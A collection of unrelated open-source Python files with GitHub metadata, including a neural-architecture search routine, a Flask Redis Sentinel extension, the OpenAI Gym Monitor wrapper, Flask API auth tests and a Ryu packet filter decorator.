assert self.num_remaining > 0
idx = searcher_eval_token["idx"]
assert self.vals[idx] is None
self.vals[idx] = val
self.num_remaining -= 1
# generate the next round of architectures by keeping the best ones.
if self.num_remaining == 0:
num_samples = int(self.reduction_factor * len(self.queue))
assert num_samples > 0
top_idxs = np.argsort(self.vals)[::-1][:num_samples]
self.queue = [self.queue[idx] for idx in top_idxs]
self.vals = [None for _ in range(num_samples)]
self.num_remaining = num_samples
self.idx = 0
# run simple successive narrowing on a single machine.
def run_successive_narrowing(search_space_fn, num_initial_samples,
initial_budget, get_evaluator, extract_val_fn,
num_samples_reduction_factor,
budget_increase_factor, num_rounds,
get_evaluation_logger):
num_samples = num_initial_samples
searcher = SuccessiveNarrowing(search_space_fn, num_initial_samples,
num_samples_reduction_factor)
evaluation_id = 0
for round_idx in range(num_rounds):
budget = initial_budget * (budget_increase_factor**round_idx)
evaluator = get_evaluator(budget)
for idx in range(num_samples):
(inputs, outputs, hyperp_value_lst,
searcher_eval_token) = searcher.sample()
results = evaluator.eval(inputs, outputs)
val = extract_val_fn(results)
searcher.update(val, searcher_eval_token)
logger = get_evaluation_logger(evaluation_id)
logger.log_config(hyperp_value_lst, searcher_eval_token)
logger.log_results(results)
evaluation_id += 1
num_samples = int(num_samples_reduction_factor * num_samples)
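# --- Schedule sketch (illustration only; not part of the original module) ---
# Mirrors the arithmetic in run_successive_narrowing to show how the number of
# surviving candidates and the per-candidate budget evolve across rounds. The
# constants are arbitrary examples.
def _narrowing_schedule_sketch(num_initial_samples=64, initial_budget=1.0,
                               num_samples_reduction_factor=0.5,
                               budget_increase_factor=2.0, num_rounds=4):
    schedule = []
    num_samples = num_initial_samples
    for round_idx in range(num_rounds):
        budget = initial_budget * (budget_increase_factor ** round_idx)
        schedule.append((round_idx, num_samples, budget))
        num_samples = int(num_samples_reduction_factor * num_samples)
    # e.g. [(0, 64, 1.0), (1, 32, 2.0), (2, 16, 4.0), (3, 8, 8.0)]
    return schedule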
|
{
"content_hash": "ffb420bc70a7e5c47bebed68e7cea8ea",
"timestamp": "",
"source": "github",
"line_count": 77,
"max_line_length": 78,
"avg_line_length": 42,
"alnum_prop": 0.6038961038961039,
"repo_name": "negrinho/deep_architect",
"id": "134a53471e6d7282b03c7bc82d81337f7df6746c",
"size": "3234",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "deep_architect/searchers/successive_narrowing.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "572577"
},
{
"name": "Shell",
"bytes": "11377"
}
],
"symlink_target": ""
}
|
import six
import inspect
import redis
import redis.sentinel
import redis_sentinel_url
from flask import current_app
from werkzeug.local import Local, LocalProxy
from werkzeug.utils import import_string
_EXTENSION_KEY = 'redissentinel'
class RedisSentinelInstance(object):
def __init__(self, url, client_class, client_options, sentinel_class, sentinel_options):
self.url = url
self.client_class = client_class
self.client_options = client_options
self.sentinel_class = sentinel_class
self.sentinel_options = sentinel_options
self.local = Local()
self._connect()
if self.local.connection[0] is None:
# if there is no sentinel, we don't need to use thread-local storage
self.connection = self.local.connection
self.local = self
def _connect(self):
try:
return self.local.connection
except AttributeError:
conn = redis_sentinel_url.connect(
self.url,
sentinel_class=self.sentinel_class, sentinel_options=self.sentinel_options,
client_class=self.client_class, client_options=self.client_options)
self.local.connection = conn
return conn
@property
def sentinel(self):
return self._connect()[0]
@property
def default_connection(self):
return self._connect()[1]
def master_for(self, service_name, **kwargs):
try:
return self.local.master_connections[service_name]
except AttributeError:
self.local.master_connections = {}
except KeyError:
pass
sentinel = self.sentinel
if sentinel is None:
msg = 'Cannot get master {} using non-sentinel configuration'
raise RuntimeError(msg.format(service_name))
conn = sentinel.master_for(service_name, redis_class=self.client_class, **kwargs)
self.local.master_connections[service_name] = conn
return conn
def slave_for(self, service_name, **kwargs):
try:
return self.local.slave_connections[service_name]
except AttributeError:
self.local.slave_connections = {}
except KeyError:
pass
sentinel = self.sentinel
if sentinel is None:
msg = 'Cannot get slave {} using non-sentinel configuration'
raise RuntimeError(msg.format(service_name))
conn = sentinel.slave_for(service_name, redis_class=self.client_class, **kwargs)
self.local.slave_connections[service_name] = conn
return conn
class RedisSentinel(object):
"""Flask extension that supports connections to master using Redis Sentinel.
Supported URL types:
redis+sentinel://
redis://
rediss://
unix://
"""
def __init__(self, app=None, config_prefix='REDIS', client_class=None, sentinel_class=None):
self.config_prefix = config_prefix
self.client_class = client_class
self.sentinel_class = sentinel_class
if app is not None:
self.init_app(app)
self.sentinel = LocalProxy(lambda: self.get_instance().sentinel)
self.default_connection = LocalProxy(lambda: self.get_instance().default_connection)
def init_app(self, app, config_prefix=None, client_class=None, sentinel_class=None):
config_prefix = config_prefix or self.config_prefix
app.config.setdefault(config_prefix + '_' + 'URL', 'redis://localhost/0')
config = self._strip_dict_prefix(app.config, config_prefix + '_')
extensions = app.extensions.setdefault(_EXTENSION_KEY, {})
if config_prefix in extensions:
msg = 'Redis sentinel extension with config prefix {} is already registered'
raise RuntimeError(msg.format(config_prefix))
client_class = self._resolve_class(
config, 'CLASS', 'client_class', client_class, redis.StrictRedis)
sentinel_class = self._resolve_class(
config, 'SENTINEL_CLASS', 'sentinel_class', sentinel_class, redis.sentinel.Sentinel)
url = config.pop('URL')
client_options = self._config_from_variables(config, client_class)
sentinel_options = self._config_from_variables(
self._strip_dict_prefix(config, 'SENTINEL_'), client_class)
extensions[config_prefix] = RedisSentinelInstance(
url, client_class, client_options, sentinel_class, sentinel_options)
self.config_prefix = config_prefix
def _resolve_class(self, config, config_key, attr, the_class, default_class):
if the_class is None:
the_class = getattr(self, attr)
if the_class is None:
the_class = config.get(config_key, default_class)
if isinstance(the_class, six.string_types):
the_class = import_string(the_class)
config.pop(config_key, None)
return the_class
@staticmethod
def _strip_dict_prefix(orig, prefix):
return {k[len(prefix):]: v for (k, v) in six.iteritems(orig) if k.startswith(prefix)}
@staticmethod
def _config_from_variables(config, the_class):
args = inspect.getargspec(the_class.__init__).args
args.remove('self')
args.remove('host')
args.remove('port')
args.remove('db')
return {arg: config[arg.upper()] for arg in args if arg.upper() in config}
def get_instance(self):
app = current_app._get_current_object()
if _EXTENSION_KEY not in app.extensions or self.config_prefix not in app.extensions[_EXTENSION_KEY]:
msg = 'Redis sentinel extension with config prefix {} was not initialized for application {}'
raise RuntimeError(msg.format(self.config_prefix, app.import_name))
return app.extensions[_EXTENSION_KEY][self.config_prefix]
def master_for(self, service_name, **kwargs):
return LocalProxy(lambda: self.get_instance().master_for(service_name, **kwargs))
def slave_for(self, service_name, **kwargs):
return LocalProxy(lambda: self.get_instance().slave_for(service_name, **kwargs))
SentinelExtension = RedisSentinel # for backwards-compatibility
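# --- Usage sketch (illustration only; not part of the original module) ---
# Minimal Flask wiring, assuming a Redis Sentinel listening on localhost:26379
# that manages a service named 'mymaster'; both values are placeholders.
def _redis_sentinel_usage_sketch():
    from flask import Flask
    app = Flask(__name__)
    app.config['REDIS_URL'] = 'redis+sentinel://localhost:26379/mymaster/0'
    redis_ext = RedisSentinel(app)
    # master_for returns a LocalProxy; it resolves to a client bound to the
    # current master only when dereferenced inside an application context.
    master = redis_ext.master_for('mymaster')
    return master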
|
{
"content_hash": "ddd8e5562d07f3ab4017e1fa66ec69f1",
"timestamp": "",
"source": "github",
"line_count": 166,
"max_line_length": 108,
"avg_line_length": 37.626506024096386,
"alnum_prop": 0.6402497598463016,
"repo_name": "exponea/flask-redis-sentinel",
"id": "d8d9f7eef4c87130f98bd995326b03ca6158d1d2",
"size": "6855",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "flask_redis_sentinel.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "26052"
}
],
"symlink_target": ""
}
|
"""Tests for the "update_gcp_log_flow_filter" module."""
import unittest
from unittest import mock
from google.auth.transport import requests
from . import update_gcp_log_flow_filter
SAMPLE_FILTER_ID = "00000000-0000-0000-0000-000000000000"
DEFAULT_FILTER_EXPRESSION = (
"log_id(\"dns.googleapis.com/dns_queries\") OR "
"log_id(\"cloudaudit.googleapis.com/activity\") OR "
"log_id(\"cloudaudit.googleapis.com/system_event\")")
class UpdateGCPLogFlowFilter(unittest.TestCase):
def test_initialize_command_line_args(self):
actual = update_gcp_log_flow_filter.initialize_command_line_args([
"--credentials_file=./foo.json", "--organization_id=123",
f"--filter_id={SAMPLE_FILTER_ID}",
f"--filter_expression={DEFAULT_FILTER_EXPRESSION}"
])
self.assertIsNotNone(actual)
def test_initialize_command_line_args_organization_id_too_big(self):
invalid_organization_id = 2**64
actual = update_gcp_log_flow_filter.initialize_command_line_args([
f"--organization_id={invalid_organization_id}",
f"--filter_id={SAMPLE_FILTER_ID}",
f"--filter_expression={DEFAULT_FILTER_EXPRESSION}"
])
self.assertIsNone(actual)
def test_initialize_command_line_args_negative_organization_id(self):
actual = update_gcp_log_flow_filter.initialize_command_line_args([
"--organization_id=-1", f"--filter_id={SAMPLE_FILTER_ID}",
f"--filter_expression={DEFAULT_FILTER_EXPRESSION}"
])
self.assertIsNone(actual)
def test_initialize_command_line_args_invalid_filter_id(self):
actual = update_gcp_log_flow_filter.initialize_command_line_args([
"--organization_id=123", "--filter_id=123",
f"--filter_expression={DEFAULT_FILTER_EXPRESSION}"
])
self.assertIsNone(actual)
@mock.patch.object(requests, "AuthorizedSession", autospec=True)
@mock.patch.object(requests.requests, "Response", autospec=True)
def test_http_error(self, mock_response, mock_session):
mock_session.request.return_value = mock_response
type(mock_response).status_code = mock.PropertyMock(return_value=400)
mock_response.raise_for_status.side_effect = (
requests.requests.exceptions.HTTPError())
with self.assertRaises(requests.requests.exceptions.HTTPError):
update_gcp_log_flow_filter.update_gcp_log_flow_filter(
mock_session, 123, SAMPLE_FILTER_ID, DEFAULT_FILTER_EXPRESSION)
@mock.patch.object(requests, "AuthorizedSession", autospec=True)
@mock.patch.object(requests.requests, "Response", autospec=True)
def test_happy_path(self, mock_response, mock_session):
mock_session.request.return_value = mock_response
type(mock_response).status_code = mock.PropertyMock(return_value=200)
update_gcp_log_flow_filter.update_gcp_log_flow_filter(
mock_session, 123, SAMPLE_FILTER_ID, DEFAULT_FILTER_EXPRESSION)
if __name__ == "__main__":
unittest.main()
|
{
"content_hash": "0fc3b3ba5bfd615d15dfa624c5cabcc9",
"timestamp": "",
"source": "github",
"line_count": 74,
"max_line_length": 73,
"avg_line_length": 39.37837837837838,
"alnum_prop": 0.7086479066575154,
"repo_name": "chronicle/api-samples-python",
"id": "f395af459ffa0e73a8277bde59cca82c3d7fff63",
"size": "3490",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "service_management/update_gcp_log_flow_filter_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "556471"
}
],
"symlink_target": ""
}
|
import gym
from gym import Wrapper
from gym import error, version
import os, json, logging, numpy as np, six
from gym.monitoring import stats_recorder, video_recorder
from gym.utils import atomic_write, closer
from gym.utils.json_utils import json_encode_np
logger = logging.getLogger(__name__)
FILE_PREFIX = 'openaigym'
MANIFEST_PREFIX = FILE_PREFIX + '.manifest'
class Monitor(Wrapper):
def __init__(self, env, directory, video_callable=None, force=False, resume=False,
write_upon_reset=False, uid=None, mode=None):
super(Monitor, self).__init__(env)
self.videos = []
self.stats_recorder = None
self.video_recorder = None
self.enabled = False
self.episode_id = 0
self._monitor_id = None
self.env_semantics_autoreset = env.metadata.get('semantics.autoreset')
self._start(directory, video_callable, force, resume,
write_upon_reset, uid, mode)
def _step(self, action):
self._before_step(action)
observation, reward, done, info = self.env.step(action)
done = self._after_step(observation, reward, done, info)
return observation, reward, done, info
def _reset(self):
self._before_reset()
observation = self.env.reset()
self._after_reset(observation)
return observation
def _close(self):
super(Monitor, self)._close()
# _monitor will not be set if super(Monitor, self).__init__ raises, this check prevents a confusing error message
if getattr(self, '_monitor', None):
self.close()
def set_monitor_mode(self, mode):
logger.info("Setting the monitor mode is deprecated and will be removed soon")
self._set_mode(mode)
def _start(self, directory, video_callable=None, force=False, resume=False,
write_upon_reset=False, uid=None, mode=None):
"""Start monitoring.
Args:
directory (str): A per-training run directory where to record stats.
video_callable (Optional[function, False]): function that takes in the index of the episode and outputs a boolean, indicating whether we should record a video on this episode. The default (for video_callable is None) is to take perfect cubes, capped at 1000. False disables video recording.
force (bool): Clear out existing training data from this directory (by deleting every file prefixed with "openaigym.").
resume (bool): Retain the training data already in this directory, which will be merged with our new data
write_upon_reset (bool): Write the manifest file on each reset. (This is currently a JSON file, so writing it is somewhat expensive.)
uid (Optional[str]): A unique id used as part of the suffix for the file. By default, uses os.getpid().
mode (['evaluation', 'training']): Whether this is an evaluation or training episode.
"""
if self.env.spec is None:
logger.warning("Trying to monitor an environment which has no 'spec' set. This usually means you did not create it via 'gym.make', and is recommended only for advanced users.")
env_id = '(unknown)'
else:
env_id = self.env.spec.id
if not os.path.exists(directory):
logger.info('Creating monitor directory %s', directory)
if six.PY3:
os.makedirs(directory, exist_ok=True)
else:
os.makedirs(directory)
if video_callable is None:
video_callable = capped_cubic_video_schedule
elif video_callable == False:
video_callable = disable_videos
elif not callable(video_callable):
raise error.Error('You must provide a function, None, or False for video_callable, not {}: {}'.format(type(video_callable), video_callable))
self.video_callable = video_callable
# Check on whether we need to clear anything
if force:
clear_monitor_files(directory)
elif not resume:
training_manifests = detect_training_manifests(directory)
if len(training_manifests) > 0:
raise error.Error('''Trying to write to monitor directory {} with existing monitor files: {}.
You should use a unique directory for each training run, or use 'force=True' to automatically clear previous monitor files.'''.format(directory, ', '.join(training_manifests[:5])))
self._monitor_id = monitor_closer.register(self)
self.enabled = True
self.directory = os.path.abspath(directory)
# We use the 'openai-gym' prefix to determine if a file is
# ours
self.file_prefix = FILE_PREFIX
self.file_infix = '{}.{}'.format(self._monitor_id, uid if uid else os.getpid())
self.stats_recorder = stats_recorder.StatsRecorder(directory, '{}.episode_batch.{}'.format(self.file_prefix, self.file_infix), autoreset=self.env_semantics_autoreset, env_id=env_id)
if not os.path.exists(directory): os.mkdir(directory)
self.write_upon_reset = write_upon_reset
if mode is not None:
self._set_mode(mode)
def _flush(self, force=False):
"""Flush all relevant monitor information to disk."""
if not self.write_upon_reset and not force:
return
self.stats_recorder.flush()
        # Give it a very distinguished name, since we need to pick it
# up from the filesystem later.
path = os.path.join(self.directory, '{}.manifest.{}.manifest.json'.format(self.file_prefix, self.file_infix))
logger.debug('Writing training manifest file to %s', path)
with atomic_write.atomic_write(path) as f:
# We need to write relative paths here since people may
# move the training_dir around. It would be cleaner to
# already have the basenames rather than basename'ing
# manually, but this works for now.
json.dump({
'stats': os.path.basename(self.stats_recorder.path),
'videos': [(os.path.basename(v), os.path.basename(m))
for v, m in self.videos],
'env_info': self._env_info(),
}, f, default=json_encode_np)
def close(self):
"""Flush all monitor data to disk and close any open rending windows."""
if not self.enabled:
return
self.stats_recorder.close()
if self.video_recorder is not None:
self._close_video_recorder()
self._flush(force=True)
# Stop tracking this for autoclose
monitor_closer.unregister(self._monitor_id)
self.enabled = False
logger.info('''Finished writing results. You can upload them to the scoreboard via gym.upload(%r)''', self.directory)
def _set_mode(self, mode):
if mode == 'evaluation':
type = 'e'
elif mode == 'training':
type = 't'
else:
raise error.Error('Invalid mode {}: must be "training" or "evaluation"', mode)
self.stats_recorder.type = type
def _before_step(self, action):
if not self.enabled: return
self.stats_recorder.before_step(action)
def _after_step(self, observation, reward, done, info):
if not self.enabled: return done
if done and self.env_semantics_autoreset:
# For envs with BlockingReset wrapping VNCEnv, this observation will be the first one of the new episode
self._reset_video_recorder()
self.episode_id += 1
self._flush()
if info.get('true_reward', None): # Semisupervised envs modify the rewards, but we want the original when scoring
reward = info['true_reward']
# Record stats
self.stats_recorder.after_step(observation, reward, done, info)
# Record video
self.video_recorder.capture_frame()
return done
def _before_reset(self):
if not self.enabled: return
self.stats_recorder.before_reset()
def _after_reset(self, observation):
if not self.enabled: return
# Reset the stat count
self.stats_recorder.after_reset(observation)
self._reset_video_recorder()
# Bump *after* all reset activity has finished
self.episode_id += 1
self._flush()
def _reset_video_recorder(self):
# Close any existing video recorder
if self.video_recorder:
self._close_video_recorder()
# Start recording the next video.
#
# TODO: calculate a more correct 'episode_id' upon merge
self.video_recorder = video_recorder.VideoRecorder(
env=self.env,
base_path=os.path.join(self.directory, '{}.video.{}.video{:06}'.format(self.file_prefix, self.file_infix, self.episode_id)),
metadata={'episode_id': self.episode_id},
enabled=self._video_enabled(),
)
self.video_recorder.capture_frame()
def _close_video_recorder(self):
self.video_recorder.close()
if self.video_recorder.functional:
self.videos.append((self.video_recorder.path, self.video_recorder.metadata_path))
def _video_enabled(self):
return self.video_callable(self.episode_id)
def _env_info(self):
env_info = {
'gym_version': version.VERSION,
}
if self.env.spec:
env_info['env_id'] = self.env.spec.id
return env_info
def __del__(self):
# Make sure we've closed up shop when garbage collecting
self.close()
def get_total_steps(self):
return self.stats_recorder.total_steps
def get_episode_rewards(self):
return self.stats_recorder.episode_rewards
def get_episode_lengths(self):
return self.stats_recorder.episode_lengths
def detect_training_manifests(training_dir, files=None):
if files is None:
files = os.listdir(training_dir)
return [os.path.join(training_dir, f) for f in files if f.startswith(MANIFEST_PREFIX + '.')]
def detect_monitor_files(training_dir):
return [os.path.join(training_dir, f) for f in os.listdir(training_dir) if f.startswith(FILE_PREFIX + '.')]
def clear_monitor_files(training_dir):
files = detect_monitor_files(training_dir)
if len(files) == 0:
return
logger.info('Clearing %d monitor files from previous run (because force=True was provided)', len(files))
for file in files:
os.unlink(file)
def capped_cubic_video_schedule(episode_id):
if episode_id < 1000:
return int(round(episode_id ** (1. / 3))) ** 3 == episode_id
else:
return episode_id % 1000 == 0
def disable_videos(episode_id):
return False
monitor_closer = closer.Closer()
# This method gets used for a sanity check in scoreboard/api.py. It's
# not intended for use outside of the gym codebase.
def _open_monitors():
return list(monitor_closer.closeables.values())
def load_env_info_from_manifests(manifests, training_dir):
env_infos = []
for manifest in manifests:
with open(manifest) as f:
contents = json.load(f)
env_infos.append(contents['env_info'])
env_info = collapse_env_infos(env_infos, training_dir)
return env_info
def load_results(training_dir):
if not os.path.exists(training_dir):
logger.error('Training directory %s not found', training_dir)
return
manifests = detect_training_manifests(training_dir)
if not manifests:
logger.error('No manifests found in training directory %s', training_dir)
return
logger.debug('Uploading data from manifest %s', ', '.join(manifests))
# Load up stats + video files
stats_files = []
videos = []
env_infos = []
for manifest in manifests:
with open(manifest) as f:
contents = json.load(f)
# Make these paths absolute again
stats_files.append(os.path.join(training_dir, contents['stats']))
videos += [(os.path.join(training_dir, v), os.path.join(training_dir, m))
for v, m in contents['videos']]
env_infos.append(contents['env_info'])
env_info = collapse_env_infos(env_infos, training_dir)
data_sources, initial_reset_timestamps, timestamps, episode_lengths, episode_rewards, episode_types, initial_reset_timestamp = merge_stats_files(stats_files)
return {
'manifests': manifests,
'env_info': env_info,
'data_sources': data_sources,
'timestamps': timestamps,
'episode_lengths': episode_lengths,
'episode_rewards': episode_rewards,
'episode_types': episode_types,
'initial_reset_timestamps': initial_reset_timestamps,
'initial_reset_timestamp': initial_reset_timestamp,
'videos': videos,
}
def merge_stats_files(stats_files):
timestamps = []
episode_lengths = []
episode_rewards = []
episode_types = []
initial_reset_timestamps = []
data_sources = []
for i, path in enumerate(stats_files):
with open(path) as f:
content = json.load(f)
if len(content['timestamps'])==0: continue # so empty file doesn't mess up results, due to null initial_reset_timestamp
data_sources += [i] * len(content['timestamps'])
timestamps += content['timestamps']
episode_lengths += content['episode_lengths']
episode_rewards += content['episode_rewards']
# Recent addition
episode_types += content.get('episode_types', [])
# Keep track of where each episode came from.
initial_reset_timestamps.append(content['initial_reset_timestamp'])
idxs = np.argsort(timestamps)
timestamps = np.array(timestamps)[idxs].tolist()
episode_lengths = np.array(episode_lengths)[idxs].tolist()
episode_rewards = np.array(episode_rewards)[idxs].tolist()
data_sources = np.array(data_sources)[idxs].tolist()
if episode_types:
episode_types = np.array(episode_types)[idxs].tolist()
else:
episode_types = None
if len(initial_reset_timestamps) > 0:
initial_reset_timestamp = min(initial_reset_timestamps)
else:
initial_reset_timestamp = 0
return data_sources, initial_reset_timestamps, timestamps, episode_lengths, episode_rewards, episode_types, initial_reset_timestamp
# TODO training_dir isn't used except for error messages, clean up the layering
def collapse_env_infos(env_infos, training_dir):
assert len(env_infos) > 0
first = env_infos[0]
for other in env_infos[1:]:
if first != other:
raise error.Error('Found two unequal env_infos: {} and {}. This usually indicates that your training directory {} has commingled results from multiple runs.'.format(first, other, training_dir))
for key in ['env_id', 'gym_version']:
if key not in first:
raise error.Error("env_info {} from training directory {} is missing expected key {}. This is unexpected and likely indicates a bug in gym.".format(first, training_dir, key))
return first
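# --- Usage sketch (illustration only; not part of the original module) ---
# Wraps a classic-control environment with Monitor and replays a few random
# episodes. Assumes 'CartPole-v0' is registered; the directory and episode
# count are arbitrary, and video recording is disabled to avoid an encoder
# dependency.
def _monitor_usage_sketch(directory='/tmp/cartpole-monitor'):
    env = gym.make('CartPole-v0')
    env = Monitor(env, directory, force=True, video_callable=False)
    for _ in range(3):
        done = False
        env.reset()
        while not done:
            observation, reward, done, info = env.step(env.action_space.sample())
    env.close()
    # The manifest written on close can be read back with load_results().
    return load_results(directory)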
|
{
"content_hash": "82b5070a5d0f1d0246fc645dfc1a12d9",
"timestamp": "",
"source": "github",
"line_count": 386,
"max_line_length": 302,
"avg_line_length": 39.432642487046635,
"alnum_prop": 0.6341239077590172,
"repo_name": "dianchen96/gym",
"id": "ca62135fa10726fd2a326d40740e1b91401e9bff",
"size": "15221",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "gym/wrappers/monitoring.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "461"
},
{
"name": "Python",
"bytes": "1225167"
},
{
"name": "Shell",
"bytes": "711"
}
],
"symlink_target": ""
}
|
from flask_testing import TestCase
import json
from tests import app, config, db, User
class TestRegLogin(TestCase):
    '''Tests for the user registration and login API endpoints.'''
@staticmethod
def init_db():
db.drop_all()
db.create_all()
def create_app(self):
app.config.from_object('config.TestingConfig')
return app
def setUp(self):
app = self.create_app()
self.app = app.test_client()
with app.app_context():
self.init_db()
self.reg_url = '/api/v1/auth/register'
self.login_url = '/api/v1/auth/login'
self.bucketlist_url = '/api/v1/bucketlists'
def tearDown(self):
db.session.remove()
db.session.close()
# os.unlink(app.config['SQLALCHEMY_DATABASE_URI'])
def test_db_initially_empty(self):
query = db.session.query(User).all()
assert not query
def test_home(self):
resp = self.app.get('/')
assert resp.status_code == 200
def test_username_field_required(self):
req = ({'password': 'No username'})
resp = self.app.post(self.reg_url, data=req)
# assert 'Missing data in required field' in str(resp.data)
assert resp.status_code == 422
def test_password_field_required(self):
req = ({'username': 'no_password'})
resp = self.app.post(self.reg_url, data=req)
#
assert resp.status_code == 422
def test_bad_short_required_input(self):
req = ({'username': 'tes ', 'password': ' '})
resp = self.app.post(self.reg_url, data=req)
#
assert resp.status_code == 400
def test_user_added_status(self):
# status code should be 201 for user created
req = ({'username': 'Adebayo', 'password': 'andela007'})
resp = self.app.post(self.reg_url, data=req)
assert resp.status_code == 201
def test_user_added_to_db_successfully(self):
# test that the user is present in the database
req = ({'username': 'Adebayo', 'password': 'andela007'})
self.app.post(self.reg_url, data=req)
user = User.query.get(1)
assert user.username == "Adebayo"
def test_user_duplicate_status_code(self):
# status code should be 400 for an existing user
req = ({'username': 'Adebayo', 'password': 'andela007'})
self.app.post(self.reg_url, data=req)
resp = self.app.post(self.reg_url, data=req)
assert resp.status_code == 400
def test_user_login_status(self):
# get a status code of 200 when the token is returned
req = ({'username': 'Adebayo', 'password': 'andela007'})
self.app.post(self.reg_url, data=req)
resp = self.app.post(self.login_url, data=req)
assert resp.status_code == 200
def test_status_code_user_login_with_invalid_details(self):
# status code should be 404 when logging in without registering first
req = ({'username': 'Adebayo', 'password': 'andela007'})
resp = self.app.post(self.login_url, data=req)
# json.loads(resp.data)
assert resp.status_code == 404
def test_user_can_access_auth_routes(self):
#
req = ({'username': 'Adebayo', 'password': 'andela007'})
self.app.post(self.reg_url, data=req)
token = json.loads((self.app.post(self.login_url, data=req)).data)
token = token.get('token')
resp = self.app.post(
self.bucketlist_url, data=req, headers={'Token': token})
assert resp.status_code != 401
def test_user_cannot_access_protected_route_with_invalid_token(self):
#
invalid_token = "eyJhbGciOiJIUzI1NiIsImlh\
dCI6MTQ5Mjg2MjcwOSwiZXhwIjoxNDkyOTQ5MTA5fQ.eyJpZCI6MX0.\
L5GNE_X7WspxUmLk0XKTpEJmS3XsFZfeFgdiQhLNRIo"
req = ({'username': 'Adebayo', 'password': 'andela007'})
resp = self.app.post(
self.bucketlist_url, data=req, headers={'Token': invalid_token})
assert resp.status_code == 401
def test_token_present(self):
req = ({'username': 'Adebayo', 'password': 'andela007'})
resp = self.app.post(
self.bucketlist_url, data=req)
assert resp.status_code == 401
def test_error_404_handler(self):
resp = self.app.get('/bucketlists')
assert resp.status_code == 404
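# Illustrative invocation sketch (not part of the original test module). Since
# flask_testing.TestCase builds on unittest, the suite can typically be run with
# either of the following; the runner actually used by this project is an assumption.
#
#     python -m unittest tests.test_auth
#     python -m pytest tests/test_auth.py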
|
{
"content_hash": "dc950be9603814862a3f9e4ecdee7629",
"timestamp": "",
"source": "github",
"line_count": 122,
"max_line_length": 76,
"avg_line_length": 34.89344262295082,
"alnum_prop": 0.5968992248062015,
"repo_name": "andela-oadeniran/bucket_list_api",
"id": "01ee2572e697c3d0cd806db93292b9aa7f7101fd",
"size": "4257",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_auth.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "36525"
}
],
"symlink_target": ""
}
|
class DgisError(Exception):
"""2Gis API error"""
def __init__(self, code, message, error_code):
self.code = code
self.message = message
self.error_code = error_code
def __str__(self):
return self.message
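# Illustrative usage sketch (not part of the original module): how client code
# might raise and handle DgisError. The code values used here are made up.
def _example_handle_error():
    try:
        raise DgisError(code=404, message='point not found', error_code='pointNotFound')
    except DgisError as exc:
        return '{} (code={}, error_code={})'.format(exc, exc.code, exc.error_code)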
|
{
"content_hash": "98d95528b05d7ce962929f7a12f8f339",
"timestamp": "",
"source": "github",
"line_count": 10,
"max_line_length": 50,
"avg_line_length": 25,
"alnum_prop": 0.58,
"repo_name": "svartalf/python-aio2gis",
"id": "74b185a728f8173ef39e6c1a88a89778a0fca642",
"size": "250",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "aio2gis/client/exceptions.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "8256"
}
],
"symlink_target": ""
}
|
import logging
from abc import ABCMeta, abstractmethod
import six
from ryu.lib.packet import packet
LOG = logging.getLogger(__name__)
def packet_in_filter(cls, args=None):
def _packet_in_filter(packet_in_handler):
def __packet_in_filter(self, ev):
pkt = packet.Packet(ev.msg.data)
if not packet_in_handler.pkt_in_filter.filter(pkt):
LOG.debug('The packet is discarded by %s: %s' % (cls, pkt))
return
return packet_in_handler(self, ev)
pkt_in_filter = cls(args)
packet_in_handler.pkt_in_filter = pkt_in_filter
return __packet_in_filter
return _packet_in_filter
@six.add_metaclass(ABCMeta)
class PacketInFilterBase(object):
def __init__(self, args):
self.args = args
@abstractmethod
def filter(self, pkt):
pass
class RequiredTypeFilter(PacketInFilterBase):
def filter(self, pkt):
required_types = self.args.get('types') or []
for required_type in required_types:
if not pkt.get_protocol(required_type):
return False
return True
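# Illustrative usage sketch (not part of this module): a Ryu application method
# could be decorated so that only packets carrying both Ethernet and IPv4 headers
# reach the handler. The app and handler names are hypothetical; the imports are
# assumed to be available in a standard Ryu installation.
#
#     from ryu.base import app_manager
#     from ryu.controller import ofp_event
#     from ryu.controller.handler import MAIN_DISPATCHER, set_ev_cls
#     from ryu.lib.packet import ethernet, ipv4
#
#     class ExampleApp(app_manager.RyuApp):
#         @set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)
#         @packet_in_filter(RequiredTypeFilter, {'types': [ethernet.ethernet, ipv4.ipv4]})
#         def packet_in_handler(self, ev):
#             self.logger.info('packet with Ethernet and IPv4 headers received')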
|
{
"content_hash": "6b21ad3d61ecdd4946015085799ba5d5",
"timestamp": "",
"source": "github",
"line_count": 41,
"max_line_length": 75,
"avg_line_length": 27.51219512195122,
"alnum_prop": 0.6223404255319149,
"repo_name": "yamada-h/ryu",
"id": "a84f7bb48be4f3e9fced8fe3be730aeb694f0883",
"size": "1759",
"binary": false,
"copies": "9",
"ref": "refs/heads/master",
"path": "ryu/lib/ofp_pktinfilter.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Erlang",
"bytes": "870216"
},
{
"name": "Python",
"bytes": "4257058"
},
{
"name": "Shell",
"bytes": "14336"
}
],
"symlink_target": ""
}
|
"""Automatically setup docs for a project
Call from command line:
bench frappe --setup_docs app docs_app path
"""
import os, json, frappe, markdown2, shutil
class setup_docs(object):
def __init__(self):
"""Generate source templates for models reference and module API
and templates at `templates/autodoc`
"""
self.app = frappe.get_hooks("autodoc").get("for_app")[0]
docs_app = frappe.get_hooks("autodoc").get("docs_app")[0]
hooks = frappe.get_hooks(app_name = self.app)
self.app_title = hooks.get("app_title")[0]
self.app_path = frappe.get_app_path(self.app)
path = frappe.get_app_path(docs_app, "www", "current")
print "Deleting current..."
shutil.rmtree(path, ignore_errors = True)
os.makedirs(path)
self.app_context = {
"app": {
"name": self.app,
"title": self.app_title,
"description": markdown2.markdown(hooks.get("app_description")[0]),
"version": hooks.get("app_version")[0],
"publisher": hooks.get("app_publisher")[0],
"github_link": hooks.get("github_link")[0],
}
}
